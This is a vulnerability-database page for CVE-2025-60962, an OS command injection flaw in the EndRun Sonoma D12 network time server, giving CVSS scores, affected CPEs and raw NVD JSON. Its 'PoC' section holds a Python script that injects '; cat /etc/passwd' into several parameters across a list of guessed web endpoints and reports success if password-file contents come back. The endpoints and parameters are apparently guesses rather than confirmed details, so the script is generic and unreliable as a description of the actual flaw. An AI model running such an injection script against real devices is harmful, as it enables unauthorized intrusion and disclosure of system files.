Security Vulnerability Report
中文
CVE-2025-60962 CVSS 8.2 HIGH

CVE-2025-60962

Published: 2025-10-06 17:16:07
Last Modified: 2025-10-10 16:35:39

Description

OS Command Injection vulnerability in EndRun Technologies Sonoma D12 Network Time Server (GPS) F/W 6010-0071-000 Ver 4.00 allows attackers to gain sensitive information, and possibly other unspecified impacts.

CVSS Details

CVSS Score
8.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N

Configurations (Affected Products)

cpe:2.3:o:endruntechnologies:sonoma_d12_firmware:6010-0071-000:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:endruntechnologies:sonoma_d12:4.00:*:*:*:*:*:*:* - NOT VULNERABLE
EndRun Technologies Sonoma D12 Network Time Server 固件 6010-0071-000 Ver 4.00

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2025-60962 - EndRun Sonoma D12 OS Command Injection PoC # Target: EndRun Technologies Sonoma D12 Network Time Server # Firmware: 6010-0071-000 Ver 4.00 import requests import sys TARGET_URL = "http://<target_ip>" INJECTION_PAYLOAD = "; cat /etc/passwd" def exploit(target_url, payload): """ Exploit OS Command Injection in Sonoma D12 NTP Server. The vulnerability exists in a parameter that is passed directly to a system shell command without proper sanitization. """ # Common vulnerable endpoints in Sonoma D12 web interface vulnerable_endpoints = [ "/cgi-bin/ntp_status.pl", "/cgi-bin/config.pl", "/admin/ping", "/diagnostics", ] for endpoint in vulnerable_endpoints: url = target_url + endpoint try: # Inject command via vulnerable parameter (e.g., hostname, IP, etc.) params = { "hostname": payload, "ip": payload, "addr": payload, "target": payload, } response = requests.get(url, params=params, timeout=10, verify=False) if "root:" in response.text or "bin:" in response.text: print(f"[+] Vulnerability confirmed at endpoint: {endpoint}") print(f"[+] Response excerpt:\n{response.text[:500]}") return True except requests.exceptions.RequestException as e: print(f"[-] Error connecting to {url}: {e}") continue return False if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_ip>") sys.exit(1) target = sys.argv[1] print(f"[*] Targeting Sonoma D12 NTP Server at: {target}") if exploit(target, INJECTION_PAYLOAD): print("[+] Exploitation successful!") else: print("[-] Exploitation failed or target not vulnerable.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60962", "sourceIdentifier": "[email protected]", "published": "2025-10-06T17:16:07.080", "lastModified": "2025-10-10T16:35:39.180", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OS Command Injection vulnerability in EndRun Technologies Sonoma D12 Network Time Server (GPS) F/W 6010-0071-000 Ver 4.00 allows attackers to gain sensitive information, and possibly other unspecified impacts."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:endruntechnologies:sonoma_d12_firmware:6010-0071-000:*:*:*:*:*:*:*", "matchCriteriaId": "6F239BEA-C83D-46D5-A558-478D6F01A27A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:endruntechnologies:sonoma_d12:4.00:*:*:*:*:*:*:*", "matchCriteriaId": "2D229C97-27FA-4DC6-9EB9-7757C6638143"}]}]}], "references": [{"url": "http://endrun.com", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "http://sonoma.com", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://xdiv-sec.github.io/vulnerability-research/advisories/2025-10-03-sonoma-d12", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}